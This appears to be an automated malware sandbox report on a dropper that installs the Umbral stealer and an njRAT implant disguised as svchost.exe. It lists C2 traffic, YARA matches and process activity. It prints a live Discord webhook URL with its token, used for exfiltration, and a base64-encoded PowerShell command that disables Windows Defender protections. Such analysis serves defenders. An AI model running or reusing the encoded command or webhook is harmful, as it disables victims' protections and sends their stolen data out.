              Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49756 -> 3.125.223.134:19177
              Source: TrafficSnort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49756 -> 3.125.223.134:19177
              Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49757 -> 3.125.223.134:19177
              Source: TrafficSnort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49757 -> 3.125.223.134:19177
              Source: TrafficSnort IDS: 2814860 ETPRO TROJAN njRAT/Bladabindi CnC Callback (act) 192.168.2.4:49757 -> 3.125.223.134:19177
              Source: TrafficSnort IDS: 2825564 ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act) 192.168.2.4:49757 -> 3.125.223.134:19177
              Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49758 -> 3.125.223.134:19177
              Source: TrafficSnort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49758 -> 3.125.223.134:19177
              Source: TrafficSnort IDS: 2814860 ETPRO TROJAN njRAT/Bladabindi CnC Callback (act) 192.168.2.4:49758 -> 3.125.223.134:19177
              Source: TrafficSnort IDS: 2825564 ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act) 192.168.2.4:49758 -> 3.125.223.134:19177
              Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49759 -> 3.124.142.205:19177
              Source: TrafficSnort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49759 -> 3.124.142.205:19177
              Source: TrafficSnort IDS: 2814860 ETPRO TROJAN njRAT/Bladabindi CnC Callback (act) 192.168.2.4:49759 -> 3.124.142.205:19177
              Source: TrafficSnort IDS: 2825564 ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act) 192.168.2.4:49759 -> 3.124.142.205:19177
              Source: TrafficSnort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49760 -> 3.124.142.205:19177
              Source: TrafficSnort IDS: 2814856 ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) 192.168.2.4:49760 -> 3.124.142.205:19177
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeNetwork Connect: 3.124.142.205 19177Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeNetwork Connect: 3.125.223.134 19177Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeNetwork Connect: 3.125.209.94 19177Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeNetwork Connect: 18.158.249.75 19177Jump to behavior
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: https://discord.com/api/webhooks/1225910337656590376/EwVP3wlMQgDXxoBxwLhaflFWF2WGja-17Tz3uwtoNirVyl9iU_nVCUsOrUJN46JTk-_-
              Yara detected Generic Downloader
              Source: Yara matchFile source: 3.2.ANDYzz-protected.exe.191dc700000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.ANDYzz-protected.exe.191d3c91a78.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4123441835.00000191DC700000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: global trafficTCP traffic: 192.168.2.4:49737 -> 18.158.249.75:19177
              Source: global trafficTCP traffic: 192.168.2.4:49750 -> 3.125.209.94:19177
              Source: global trafficTCP traffic: 192.168.2.4:49754 -> 3.125.223.134:19177
              Source: global trafficTCP traffic: 192.168.2.4:49759 -> 3.124.142.205:19177
              Source: global trafficHTTP traffic detected: POST /api/1.0/ HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: keyauth.winContent-Length: 376Expect: 100-continueConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /api/1.0/ HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: keyauth.winContent-Length: 162Expect: 100-continue
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewIP Address: 3.125.223.134 3.125.223.134
              Source: Joe Sandbox ViewIP Address: 3.125.209.94 3.125.209.94
              Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
              Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
              Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: ip-api.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: unknownDNS traffic detected: queries for: keyauth.win
              Source: unknownHTTP traffic detected: POST /api/1.0/ HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: keyauth.winContent-Length: 376Expect: 100-continueConnection: Keep-Alive
              Source: ANDYzz-protected.exe, 00000003.00000002.4115838115.00000191D3C81000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe, 00000003.00000002.4123441835.00000191DC700000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: ANDYzz-protected.exe, 00000003.00000002.4115838115.00000191D3C81000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe, 00000003.00000002.4123441835.00000191DC700000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: ANDYzz-protected.exe, 00000003.00000002.4115838115.00000191D3C81000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe, 00000003.00000002.4123441835.00000191DC700000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: ANDYzz-protected.exe, 00000003.00000002.4115838115.00000191D3C81000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe, 00000003.00000002.4123441835.00000191DC700000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: ANDYzz-protected.exe, 00000003.00000002.4115838115.00000191D3C81000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe, 00000003.00000002.4123441835.00000191DC700000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: ANDYzz-protected.exe, 00000003.00000002.4115838115.00000191D3C81000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe, 00000003.00000002.4123441835.00000191DC700000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: Umbral.exe, 00000001.00000002.1697775557.00000253800AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gstatic.com
              Source: Umbral.exe, 00000001.00000002.1697775557.00000253800F3000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 00000001.00000002.1697775557.0000025380108000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
              Source: Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, Umbral.exe.0.drString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: Umbral.exe, 00000001.00000002.1697775557.00000253800F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, Umbral.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
              Source: Umbral.exe, 00000001.00000002.1699911979.00000253FB552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
              Source: ANDYzz-protected.exe, 00000003.00000002.4115838115.00000191D3C81000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe, 00000003.00000002.4123441835.00000191DC700000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: ANDYzz-protected.exe, 00000003.00000002.4115838115.00000191D3C81000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe, 00000003.00000002.4123441835.00000191DC700000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: ANDYzz-protected.exe, 00000003.00000002.4115838115.00000191D3C81000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe, 00000003.00000002.4123441835.00000191DC700000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3D05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
              Source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3D05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/tWQFFgygASaEccWKmNiVdEXnTMYHruQoFGGxlHMVsnlabuZvwozniMWOZDMT
              Source: Umbral.exe, 00000001.00000002.1697775557.000002538008E000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: ANDYzz-protected.exe, 00000003.00000002.4126923921.00000191DDA42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: Umbral.exe.0.drString found in binary or memory: https://discord.com/api/v10/users/
              Source: Umbral.exe, 00000001.00000002.1697775557.0000025380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1225910337656590376/EwVP3wlMQgDXxoBxwLhaflFWF2WGja-17Tz3uwtoNirVyl9
              Source: Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, Umbral.exe.0.drString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: Umbral.exe.0.drString found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
              Source: Umbral.exe, 00000001.00000002.1697775557.00000253800A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com
              Source: Umbral.exe, 00000001.00000002.1698819541.00000253F9220000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/
              Source: Umbral.exe, 00000001.00000002.1697775557.0000025380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
              Source: Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, Umbral.exe.0.drString found in binary or memory: https://gstatic.com/generate_204e==================Umbral
              Source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gunaframework.com/api/licensing.php
              Source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gunaui.com/
              Source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gunaui.com/api/licensing.php
              Source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gunaui.com/pricing
              Source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3D05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keyauth.cc/panel/amine0xp/ANDYxx/
              Source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keyauth.win
              Source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keyauth.win/api/1.0/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownHTTPS traffic detected: 104.26.0.5:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

              E-Banking Fraud

              barindex
              Yara detected Njrat
              Source: Yara matchFile source: 2.0.svchost.exe.e00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4100093724.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6264, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 2.0.svchost.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
              Source: 2.0.svchost.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
              Source: 2.0.svchost.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
              Source: 2.0.svchost.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
              Source: 1.0.Umbral.exe.253f8f30000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
              Source: 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
              Source: 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPEDMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPEDMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPEDMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPEDMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeCode function: 0_2_00007FFD9B880A310_2_00007FFD9B880A31
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_05CC42982_2_05CC4298
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_05CC42872_2_05CC4287
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeCode function: 3_2_00007FFD9B8B0AAD3_2_00007FFD9B8B0AAD
              Source: ANDYzz-protected.exe.0.drStatic PE information: No import functions for PE file found
              Source: KvS2rT08PQ.exe, 00000000.00000002.1650214474.0000000002791000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameANDYzz.exe. vs KvS2rT08PQ.exe
              Source: KvS2rT08PQ.exe, 00000000.00000002.1650647014.000000001B219000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs KvS2rT08PQ.exe
              Source: KvS2rT08PQ.exeBinary or memory string: OriginalFilenameNAM HERE.exe4 vs KvS2rT08PQ.exe
              Source: KvS2rT08PQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 2.0.svchost.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
              Source: 2.0.svchost.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.0.svchost.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
              Source: 2.0.svchost.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
              Source: 1.0.Umbral.exe.253f8f30000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
              Source: 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
              Source: 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPEDMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPEDMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPEDMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
              Source: ANDYzz-protected.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: ANDYzz-protected.exe.0.drStatic PE information: Section: fgen ZLIB complexity 1.000328828011611
              Source: Umbral.exe.0.dr, --.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
              Source: classification engineClassification label: mal100.spre.phis.troj.spyw.evad.winEXE@19/9@6/6
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_065324CE AdjustTokenPrivileges,2_2_065324CE
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_06532497 AdjustTokenPrivileges,2_2_06532497
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\KvS2rT08PQ.exe.logJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeMutant created: NULL
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeMutant created: \Sessions\1\BaseNamedObjects\6uXEbtir2ybaHnvlC
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\62b7d4736043995d94b02f8790cef504
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7232:120:WilError_03
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeMutant created: \Sessions\1\BaseNamedObjects\heh5456GeEquhSfLaVSv
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7428:120:WilError_03
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeFile created: C:\Users\user\AppData\Local\Temp\Umbral.exeJump to behavior
              Source: KvS2rT08PQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: KvS2rT08PQ.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: KvS2rT08PQ.exeReversingLabs: Detection: 68%
              Source: KvS2rT08PQ.exeVirustotal: Detection: 71%
              Source: unknownProcess created: C:\Users\user\Desktop\KvS2rT08PQ.exe "C:\Users\user\Desktop\KvS2rT08PQ.exe"
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess created: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe "C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe"
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
